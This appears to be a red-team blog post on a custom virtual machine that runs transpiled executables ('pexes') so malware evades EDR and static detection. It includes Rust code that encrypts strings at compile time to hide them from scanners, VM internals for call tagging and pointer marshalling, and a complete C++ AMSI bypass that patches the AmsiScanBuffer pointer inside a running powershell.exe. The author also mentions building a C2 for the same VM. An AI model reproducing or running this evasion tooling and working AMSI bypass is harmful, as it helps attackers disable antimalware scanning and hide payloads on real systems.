The architecture protects our pexes against pattern matching based analysis, but we did not talk about how the managed virtual machine itself is protected against those detection schemes.



There are two main defenses at play. First, as described by Boudewijn Meijer and Rick Veldhoven, a polymorphic engine is used to thwart byte matching in its .text section. Second, strings are protected by the same encryption algorithm used for encrypting the pexe. To accomplish this, a macro encrypts each string at compile time, and a function that takes the macro-produced bytes as its argument decrypts them back to cleartext at runtime. The red team maintainer can handle the string in cleartext in the code, while ensuring that it does not appear as such in the resulting pexe. This makes it so that strings are encrypted in the pexe .rdata without affecting the malware developer’s experience.

// macro used to encrypt strings

use proc_macro::TokenStream;

use quote::quote;

use syn::{parse_macro_input, LitStr};

use shared::encrypt_str;

#[proc_macro]

pub fn encrypt_string_proc(input: TokenStream) -> TokenStream {

// 1) Parse the string literal passed to the macro

let input_str = parse_macro_input!(input as LitStr).value();

// 2) Encrypt the string at compile time (returns Vec<u8>)

let encrypted_bytes = encrypt_str(&input_str);

// 3) Emit each byte as its own literal, e.g. 72, 101, 108, ...

let byte_tokens = encrypted_bytes.iter().map(|byte| {

let b = *byte;

quote! { #b }

});

// 4) Create a &[u8] literal

// It will expand to something like &[72, 101, 108, 108, ...]

let output = quote! {

&[ #(#byte_tokens),* ]

};

output.into()

}

// code sample from the managed virtual machine using the decrypt_str function

fn main() {

let matches = Command::new("pexe_runner")

.version("0.0.0.0.1")

.about(decrypt_str(encrypt_string_proc!("Runs a pexe file").to_vec()))

.arg(

Arg::new("verbose")

.short('v')

.long("verbose")

.value_parser(value_parser!(u8).range(0..=4))

.help(

decrypt_str(

encrypt_string_proc!(

"verbose value, range from 0 to 4 ; higher is more verbose. Default is 0 (no output)"

).to_vec()

)

)

)

.arg(

Arg::new("pexe")

.value_name("FILE")

.help(decrypt_str(encrypt_string_proc!("Path to the pexe file").to_vec()))

.index(1)

)

.get_matches();

}


Discriminating different kinds of CALL at runtime: the problem

As of right now, we’re able to transpile simple PEs and shellcode into pexes and execute them in our managed virtual machine. However, unless we want to re-implement everything from heap memory allocations to socket interactions, we need a way to transfer control to external APIs. In standard assembly, this would simply be done through the CALL instruction. Let’s quickly describe how that instruction works.

A CALL instruction is used to transfer code flow to another instruction. There are two ways the location of the target can be encoded.

- In a direct call, the instruction uses an immediate operand to store a relative displacement (from RIP) to the target, usually another function from the same PE.

- In an indirect call, the instruction specifies a register or memory location that contains the target address. This can point to code anywhere in memory, inside the same module or in another module (e.g., imported functions).

Discriminating between internal and external indirect calls is crucial for us, because our VM must handle internal calls (within pexe) and external calls (host/API boundary) in different ways, for reasons I’m going to lay out.

In standard x86-64 execution, the CPU does not distinguish between internal or external calls: a CALL simply pushes the return address to the stack and updates RIP with the new address, regardless of whether the target is another function in the same binary or an imported API.

Let’s first remind the reader that our managed virtual machine possesses its own virtual stack, its own virtual pointers, its own virtual RIP, etc.

In a direct call, what the managed virtual machine does is similar to how direct CALL operates in x86-64: we add the signed immediate value to the current RIP, and we get our new address. The only major difference is that in phantomerie’s assembly, the immediate value is a displacement in number of pinstructions instead of an offset expressed in bytes.
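The index arithmetic of a direct call can be sketched as follows. This is a minimal illustration, not the actual phantomerie code: the function name `direct_call_target` is hypothetical, and the sketch assumes the displacement is relative to the pinstruction following the CALL (mirroring how a native rel32 is relative to the next instruction).

```rust
/// Computes the pinstruction index targeted by a direct CALL.
///
/// Assumption (not confirmed by the article): the signed displacement is
/// counted in pinstructions from the pinstruction that follows the CALL.
/// Returns None if the computation would leave the valid index range.
fn direct_call_target(call_index: u64, displacement: i64) -> Option<u64> {
    // The return address is the pinstruction right after the CALL.
    let return_index = call_index.checked_add(1)?;
    // Apply the signed displacement without wrapping around.
    return_index.checked_add_signed(displacement)
}
```

Using checked arithmetic means a corrupted displacement results in an explicit failure instead of silently wrapping to an unrelated pinstruction.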

However, for an internal indirect CALL, the operand holds a pointer to the target function’s address. In our transpiled instruction set, that operand doesn’t reference a native pointer; instead, it encodes the index of the pinstruction where execution should resume. When an internal indirect CALL is executed, our virtual RIP is set to this new pinstruction index.

For an external indirect CALL, the situation is different once again: execution happens outside the managed virtual machine. In this case, the operand does contain a native pointer that is meaningful to the host process but not to our virtual CPU. Here, the MVM’s task is to extract the aforementioned pointer, recover the arguments according to the x64 Windows calling convention, and then invoke the external function reflectively, effectively transferring code execution outside of the MVM context.

You can see that the way the managed virtual machine operates differs in each case. If it only supported direct calls and internal indirect calls, this would not cause any issue: the MVM would identify which operand is at play (immediate or indirect) and execute the correct course of action. But since it also needs to support external indirect calls, when confronted with an indirect CALL, our managed virtual machine currently does not have enough information to choose between the internal and external variants of the instruction.

Discriminating different kinds of CALL at runtime: the solution

The solution that was provided in the article (and that we implemented) is to put the unused bits of addresses in x86-64 to use.



Indeed, on x86-64, virtual addresses don’t actually span the full 64-bit space. With the usual 4-level paging, only 48 bits are used, and the unused high bits (63 to 48) must mirror the most significant used bit (bit 47), a rule known as sign extension. An address that follows this rule is called canonical, and every address must conform to that format.

What does this mean concretely? Well, it means that valid addresses are in either of those two ranges: 0x00000000_00000000-0x00007FFF_FFFFFFFF and 0xFFFF8000_00000000-0xFFFFFFFF_FFFFFFFF.
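As a quick illustration of the canonical rule, here is a small sketch that checks whether a 64-bit value is a canonical address under 48-bit addressing. The function name `is_canonical_48` is made up for this example and does not come from the project.

```rust
/// Returns true if `addr` is canonical under 48-bit virtual addressing,
/// i.e. bits 63 to 48 are copies of bit 47.
fn is_canonical_48(addr: u64) -> bool {
    // Shift bit 47 into the sign position, then shift back arithmetically:
    // this rebuilds the address with its upper 16 bits sign-extended.
    let sign_extended = (((addr << 16) as i64) >> 16) as u64;
    sign_extended == addr
}
```

The boundaries of the two ranges above pass the check, while the first address past the lower half (0x00008000_00000000) does not.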

Additionally, in Windows, the process’s user space is mapped in the lower half of the address range, i.e. 0x00000000_00000000-0x00007FFF_FFFFFFFF. The upper half of the space is reserved for the kernel.

In practice, this means that userland addresses always have their 17 most significant bits set to zero.

This property is shared by both native pointers and the pointers used internally by the MVM.

Our MVM only manages a stack (no heap, no modules, nor anything else really). The stack is 3 MB, meaning MVM pointers range from 0x00000000_00000000 to 0x00000000_00300000, so MVM addresses only use the low 22 bits. Thus, in both cases (native pointers or MVM pointers), we can use the two most significant bytes as storage space inside the pointer to encode which kind of pointer we’re dealing with.

When a pointer reaches a CALL, the MVM reads those high-order bits, interprets the tag, and uses it to disambiguate the kind of call to perform. After the decision is made, the MVM clears the tag (masking off the high-order bits) and proceeds with the underlying address as if the tag had never been there.
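The tag, read and clear steps can be sketched as below. The names `set_tag`, `get_tag` and `AddressTag` appear in the project’s excerpts, but the bodies here are assumptions: in particular, storing the tag starting at bit 48, the `None` variant and the `clear_tag` helper are illustrative choices, not the author’s confirmed implementation.

```rust
/// Assumed position of the tag: the 16 bits left unused by 48-bit addressing.
const TAG_SHIFT: u32 = 48;
/// Mask keeping only the 48 address bits.
const ADDRESS_MASK: u64 = (1u64 << TAG_SHIFT) - 1;

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum AddressTag {
    /// Hypothetical variant for untagged or unknown values.
    None = 0,
    ExternalAddress = 0b0001,
    InternalFunction = 0b0010,
}

/// Stores `tag` in the high bits, replacing any tag already present.
fn set_tag(address: u64, tag: AddressTag) -> u64 {
    (address & ADDRESS_MASK) | ((tag as u64) << TAG_SHIFT)
}

/// Reads the tag stored in the high bits.
fn get_tag(address: u64) -> AddressTag {
    match address >> TAG_SHIFT {
        0b0001 => AddressTag::ExternalAddress,
        0b0010 => AddressTag::InternalFunction,
        _ => AddressTag::None,
    }
}

/// Masks off the high bits to recover the underlying address.
fn clear_tag(address: u64) -> u64 {
    address & ADDRESS_MASK
}
```

Note that a tagged userland pointer is no longer canonical, which is why the tag has to be cleared before the address is handed to anything outside the MVM.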

address_tag!(

ExternalAddress = 0b0001,

InternalFunction = 0b0010,

// other kind of tags we did not talk about yet

);

While we now have a strategy to distinguish the different kinds of calls, the question is: when and where do we encode those tags?

Detecting internal calls through the LEA instruction

This part is laid out in the Fox-IT blog post, so once again, do not hesitate to read that first.



The trick is to rely on which instruction the creation of an internal pointer is translated to. For example, for the following code, line 39 will produce a LEA instruction where the base register is RIP and the displacement points to the .text section. This is how internal pointers are created and, while I’m no compiler expert, I’ve yet to encounter a case where this pattern is not a direct consequence of an internal pointer.

As part of the transpilation process, when that kind of instruction is detected, the transpiler encodes a special operand instead of the usual MemoryOperand. This way, when the MVM reaches a LEA instruction, it can check whether it is dealing with such an operand as its source and, if so, add a specific tag to the value written to the destination operand. As said before, the purpose of this tag is to let the MVM know, when the pointer reaches a CALL instruction, that it is dealing with code internal to the pexe.

// code used at transpilation to detect instructions that create internal pointers

pub fn is_pointer_to_internal_function_construction<P: SourceParserTrait>(

instruction: &IcedInstruction,

pe_parser: &P

) -> bool {

if instruction.code() != Code::Lea_r64_m {

return false;

}

let range = pe_parser.get_text_range().unwrap();

if !is_instruction_destination_in_range(instruction, range) {

return false;

}

if instruction.op0_kind() != OpKind::Register {

return false;

}

if instruction.op1_kind() != OpKind::Memory {

return false;

}

if instruction.memory_base() != Register::RIP {

return false;

}

return true;

}

// we add the InternalFunction operand type

pub enum OperandType {

Immediate,

Memory,

Register,

InternalFunction,

}

// simplified LEA code

pub fn lea(&mut self, instruction: &Instruction) {

let right_operand_type = OperandType::from(instruction.right_operand_type);

let operand = MemoryOperand::from_u64(instruction.right_operand);

let mut return_value = operand.get_effective_address(|reg|

self.get_register_value_u64(reg)

);

// internal function pointer creation detection happens here

if is_instruction_function_pointer_creation(instruction) {

return_value = set_tag(return_value, AddressTag::InternalFunction);

}

self.set_value_from_raw_bytes(

instruction.left_operand_type,

instruction.left_operand,

return_value as u64,

64

);

}

We now have a way of detecting and encoding that a pointer is internal to the pexe. Let’s see how we can do the same for pointers that are external to the MVM.





Tagging external pointers pre-transpilation

One way of tagging pointers to external functions is to do it directly in the source code that will later be transpiled; that is, in the actual payload we want to execute. This can be achieved by passing the pointer to the external function through a stub right before execution. The role of this stub is twofold, but we’ll only focus on the first one for now: adding the tag.

This approach is not ideal, as it means our architecture will never be compatible with arbitrary PEs unless their source code is modified to accommodate this way of transferring control to external modules. However, as will be shown later, this limitation is already inherent to our design.

// simplified stub that will execute external functions

template <typename Ret, typename... Args>

struct apicall<Ret(Args...)>

{

static decltype(auto) call(const void* address, Args... args)

{

// add tag indicating this is an external pointer. Will be used by the VMV at execution

address = (void*)add_tag_to_pointer(address, TAG_EXTERNAL_ADDRESS);

return ((f)address)(args...);

}



}// How the stub is used

MessageBoxA_t pMessageBoxA = (MessageBoxA_t)GetFunctionFromModule(user32_module, messageboxa_name);

int ret = apicall<int(HWND, LPCSTR, LPCSTR, UINT)>::call(

reinterpret_cast<const void *>(pMessageBoxA),

NULL,

msg_text,

msg_title,





MB_OK);Now, when the executable gets transpiled and executed, the pinstructions themselves will tag external pointers, as long as they go through the stub in the original source code. As illustrated by the following debug output (where the CALL at pinstruction 226 is the call to add_tag_to_pointer()):

- The first argument from RCX contains the external pointer

- The tag is added through an OR pinstruction

- After returning from add_tag_to_pointer, the tagged pointer is executed through a CALL

template <typename Ret, typename... Args>

struct apicall<Ret(Args...)>

{

static decltype(auto) call(const void* address, Args... args)

{

// add tag indicating this is an external pointer. Will be used by the MVM at execution

address = (void*)add_tag_to_pointer(address, TAG_EXTERNAL_ADDRESS);

// the rest of the code will be explained later

constexpr size_t nargs = sizeof...(Args);

using f = Ret(__stdcall*)(size_t, Args...);

// reflectively execute the pointer

return ((f)address)(nargs, args...);

}

};

Having implemented those two strategies, the MVM can now deduce from a CALL whether control should be transferred to another part of the pexe or to an external library.

// simplified CALL branch logic

pub fn call(&mut self, instruction: &Instruction) {

match OperandType::from(instruction.left_operand_type) {

OperandType::Immediate => self.call_internal_relative(instruction.left_operand),

OperandType::None => panic!("No operand type for CALL instruction"),

_ => {

let address = self.fetch_value_from_raw_bytes(

instruction.left_operand_type,

instruction.left_operand

);

let tag = get_tag(unsafe { address.u64 });

match tag {

AddressTag::InternalFunction =>

self.call_internal_absolute(instruction),

AddressTag::ExternalAddress => {

let addr = self.fetch_u64_from_left_operand(instruction);

self.call_external(addr)

}

}

}

}

}

Pointer interoperability: the problem







As mentioned earlier, our managed virtual machine uses a custom stack layout, illustrated in the screenshot below. In this example, at 0x2FFFF0 there is an "AAA..." string that runs into subsequent memory, while 0x2FFFE8 holds a pointer back to the stack. All other shown addresses are unused.

Because the MVM uses its own stack, pointers inside the MVM are managed addresses, not native process pointers. Native APIs (e.g., VirtualProtectEx) expect host-valid addresses. Passing MVM-internal addresses directly to such APIs yields invalid pointers and will break the call. Any external call that takes pointer arguments therefore requires translation or marshalling from MVM addresses to native addresses.

Yet, how is the MVM supposed to know that an argument is a pointer in order to marshal it? The argument might look like a pointer, but the MVM can’t be sure just by looking at the value itself.

While this problem appears to be inherent to the virtualization approach we’re implementing, there’s no mention of it in the article by Fox-IT, and I’d be curious to know how they handled that specific case. In any case, the solution we went with goes as follows.

Pointer interoperability: the solution



We implemented a pointer tracker whose sole purpose is to record exactly which MVM registers and which MVM addresses hold pointers. With this precise knowledge, the Foreign Function Interface of our MVM can, upon encountering a CALL to an external function, identify and marshal every argument that originates from a pointer-tracked register or memory location.









The pointer tracker works following three simple concepts:



- Instructions that create stack pointers are used as sink, and their destination operand are marked as containing a pointer



- A set of transitive operands is defined. If such an instruction is executed and its source operand is marked as a pointer, the destination operand is likewise marked as a pointer. Reciprocally, if the source operand is not marked as a pointer but its destination is, it will no longer be the case post execution.

- A category of destructive instructions is introduced to capture cases where pointer provenance is lost. For these instructions, the destination operand is always cleared of its pointer tag after execution, regardless of the source operand’s state.
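The three rules above can be sketched as a small taint-style tracker. This is only an illustration under stated assumptions: the `Location`, `Effect` and `PointerTracker` types are hypothetical names, and which pinstructions fall into each category is not specified here.

```rust
use std::collections::HashSet;

/// A place inside the VM that can hold a value (illustrative names).
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
enum Location {
    /// Hypothetical register index.
    Register(u8),
    /// Address on the MVM stack.
    Memory(u64),
}

/// How an executed pinstruction affects pointer provenance.
#[derive(Debug, Clone, Copy)]
enum Effect {
    /// The instruction creates a stack pointer in its destination.
    CreatesPointer,
    /// The destination inherits the pointer status of the source.
    Transitive,
    /// Pointer provenance is lost, whatever the source was.
    Destructive,
}

#[derive(Debug, Default)]
struct PointerTracker {
    tracked: HashSet<Location>,
}

impl PointerTracker {
    /// Updates the tracked set after a pinstruction has executed.
    fn update(&mut self, effect: Effect, dst: Location, src: Option<Location>) {
        let dst_is_pointer = match effect {
            Effect::CreatesPointer => true,
            Effect::Transitive => src.map_or(false, |s| self.tracked.contains(&s)),
            Effect::Destructive => false,
        };
        if dst_is_pointer {
            self.tracked.insert(dst);
        } else {
            self.tracked.remove(&dst);
        }
    }

    /// Tells whether a register or stack slot currently holds a pointer.
    fn is_pointer(&self, location: Location) -> bool {
        self.tracked.contains(&location)
    }
}
```

Keeping registers and stack slots in the same set lets the FFI layer ask a single question, `is_pointer`, for every argument regardless of where it lives.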

Here’s a set of pinstructions and how the pointer tracker is updated for each of them.



Now, if VirtualProtectEx were called from our MVM, the second and fifth arguments, which are supposed to be native pointers, would get marshalled before calling the API:

- The second argument comes from RDX. It is marked as containing a pointer, so it gets marshalled.

- The fifth argument is on the stack, at address 0x2FF_FF0. It is marked in a similar manner, so it also gets marshalled.
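The marshalling step itself can be sketched as a simple address translation. This is a sketch under a strong assumption that is not confirmed by the text: the virtual stack is backed by one contiguous host buffer starting at `host_base`, so an MVM address is just an offset into it. The names `marshal_pointer` and `marshal_args` are hypothetical.

```rust
/// Size of the MVM stack (3 MB, as stated earlier).
const STACK_SIZE: u64 = 0x30_0000;

/// Translates an MVM stack address into a native address.
/// Assumption: the virtual stack lives in one contiguous host buffer
/// whose first byte is at `host_base`.
fn marshal_pointer(mvm_address: u64, host_base: u64) -> Option<u64> {
    if mvm_address > STACK_SIZE {
        return None; // not an address inside the virtual stack
    }
    host_base.checked_add(mvm_address)
}

/// Marshals only the arguments flagged as pointers by the pointer tracker;
/// every other value is passed through untouched.
fn marshal_args(args: &[(u64, bool)], host_base: u64) -> Option<Vec<u64>> {
    args.iter()
        .map(|&(value, is_pointer)| {
            if is_pointer {
                marshal_pointer(value, host_base)
            } else {
                Some(value)
            }
        })
        .collect()
}
```

The boolean attached to each argument stands for the pointer tracker’s verdict, which is what keeps an integer that merely looks like a stack address from being rewritten.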



Proof of concept



And finally, here’s what is probably the most interesting part: does it work? In the following proof of concept, we’ll transpile a C++ version of an AMSI bypass I made, and execute it through the MVM.

// entry point of our amsi bypass

extern "C" int _start()

{

HMODULE kernel32 = GetModuleFromName(L"kernel32.dll");

apicall<int(const char *, void *)>::msvcrt_printf("Kernel32 module base: %i", kernel32);

// Kernel32 functions to load in one go

const char *kernel32_funcs[] = {

"LoadLibraryA",

"VirtualAllocEx",

"WriteProcessMemory"};

FARPROC k32_addrs[3] = {0};

GetFunctionsFromModule(kernel32, kernel32_funcs, 3, k32_addrs);

if (!k32_addrs[1])

{

apicall<int(const char *)>::msvcrt_printf("Failed to get VirtualAllocEx address\n");

return 0x7780;

}

if (!k32_addrs[0])

{

apicall<int(const char *)>::msvcrt_printf("Failed to get LoadLibraryA address\n");

return 0x7779;

}

if (!k32_addrs[2])

{

apicall<int(const char *)>::msvcrt_printf("Failed to get WriteProcessMemory address\n");

return 0x7781;

}

FARPROC LoadLibraryA_fn = k32_addrs[0];

FARPROC VirtualAllocEx_fn = k32_addrs[1];

FARPROC WriteProcessMemory_fn = k32_addrs[2];

HMODULE amsiBase = apicall<HMODULE(const char *)>::call(LoadLibraryA_fn, "amsi.dll");

FARPROC AmsiScanBufferPtr = GetFunctionFromModule(amsiBase, "AmsiScanBuffer");

apicall<int(const char *, void *)>::msvcrt_printf("AmsiScanBuffer local address: %p\n", AmsiScanBufferPtr);

if (!amsiBase)

{

apicall<int(const char *)>::msvcrt_printf("Failed to load amsi.dll\n");

return 0x7770;

}

if (!AmsiScanBufferPtr)

{

apicall<int(const char *)>::msvcrt_printf("Failed to get AmsiScanBuffer\n");

return 0x7771;

}

HANDLE hRemoteProcess = OpenProcessByName(kernel32, L"powershell.exe");

if (!hRemoteProcess)

{

apicall<int(const char *)>::msvcrt_printf("Target process not found or access denied\n");

return 0x7772;

}

HMODULE remoteAutomationBase = (HMODULE)GetRemoteModuleBaseFromHandle(kernel32, hRemoteProcess, L"System.Management.Automation.ni.dll");

if (!remoteAutomationBase)

{

apicall<int(const char *)>::msvcrt_printf("System.Management.Automation.ni.dll not found in remote process\n");

return 0x7773;

}

SIZE_T offset = FindAmsiPtrOffsetRemote(kernel32, hRemoteProcess, remoteAutomationBase, AmsiScanBufferPtr);

if (!offset)

{

apicall<int(const char *)>::msvcrt_printf("AmsiScanBuffer pointer not found in remote .data section\n");

return 0x7774;

}

apicall<int(const char *, int)>::msvcrt_printf("Found AmsiScanBuffer at offset: %x\n", offset);

unsigned char DummyAmsiScanBuffer[] = {

0x48, 0x31, 0xC0, // xor rax, rax

0xC3 // ret

};

LPVOID remotePointerToFakeAmsi = apicall<LPVOID(HANDLE, LPVOID, SIZE_T, DWORD, DWORD)>::call(

VirtualAllocEx_fn,

hRemoteProcess,

NULL,

sizeof(DummyAmsiScanBuffer),

MEM_COMMIT | MEM_RESERVE,

PAGE_EXECUTE_READWRITE);

if (!remotePointerToFakeAmsi)

{

apicall<int(const char *)>::msvcrt_printf("Failed to allocate memory in remote process\n");

return 0x7775;

}

apicall<int(const char *, void *, HANDLE, LPVOID, LPCVOID, SIZE_T, void *)>::msvcrt_printf(

"WriteProcessMemory(fn=%p, hProcess=0x%p, lpBaseAddress=%p, lpBuffer=%p, nSize=%zu, lpNumberOfBytesWritten=%p)\n",

WriteProcessMemory_fn,

hRemoteProcess,

remotePointerToFakeAmsi,

DummyAmsiScanBuffer,

sizeof(DummyAmsiScanBuffer),

(void *)NULL);

if (!apicall<BOOL(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *)>::call(

WriteProcessMemory_fn,

hRemoteProcess,

remotePointerToFakeAmsi,

DummyAmsiScanBuffer,

sizeof(DummyAmsiScanBuffer),

NULL))

{

apicall<int(const char *)>::msvcrt_printf("Failed to write dummy shellcode to remote process\n");

return 0x7776;

}

void *patchAddr = (BYTE *)remoteAutomationBase + offset;

SIZE_T written;

DWORD oldProtect;

if (!apicall<BOOL(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *)>::call(

WriteProcessMemory_fn,

hRemoteProcess,

patchAddr,

&remotePointerToFakeAmsi,

sizeof(remotePointerToFakeAmsi),

&written))

{

apicall<int(const char *)>::msvcrt_printf("Failed to overwrite pointer in remote process\n");

return 0x7778;

}

apicall<int(const char *, int)>::msvcrt_printf("Wrote %zu bytes to remote process, AMSI should be dead.\n", written);

return 0x7777;

}

Did it help me bypass EDRs?

Not yet. As long as the technology is not mature (and I don’t think it is yet), I won’t be using it in real engagements. Whether this approach will hold under real-world scrutiny is still an open question, but the architecture feels right. For now, it stands as both a proof of concept and an invitation: to rethink how offensive tooling can evolve now that stealth has become harder to achieve while remaining just as important.

What now?

- An attentive reader may have noticed I did not utter a word about the polymorphic engine intended to protect the MVM from static analysis.

- In the meantime, I’m implementing a C2 from scratch using code compatible with the MVM. The ultimate objective is to provide the core C2 functionalities via pexe execution.

- A practical way to streamline the transpilation pipeline would be to automatically add the stub, either in the source code or in the exe. I thought about leveraging LLVM to automatically insert stubs for imported functions. There might also be a way to use import, relocation, or jump-table analysis to auto-tag external call sites in PEs. While this would be nice to have, it is still at the idea stage, and no work has been done on that matter.

- Produce performance and detectability baselines (instructions per second, memory churn, ETW footprint) and compare them to a naïve packer plus a classic loader.

- Document a clear threat model (what we do and don’t try to hide), then publish a small EDR matrix with reproducible tests. This would need access to real EDRs though, which I’m not in a position to obtain.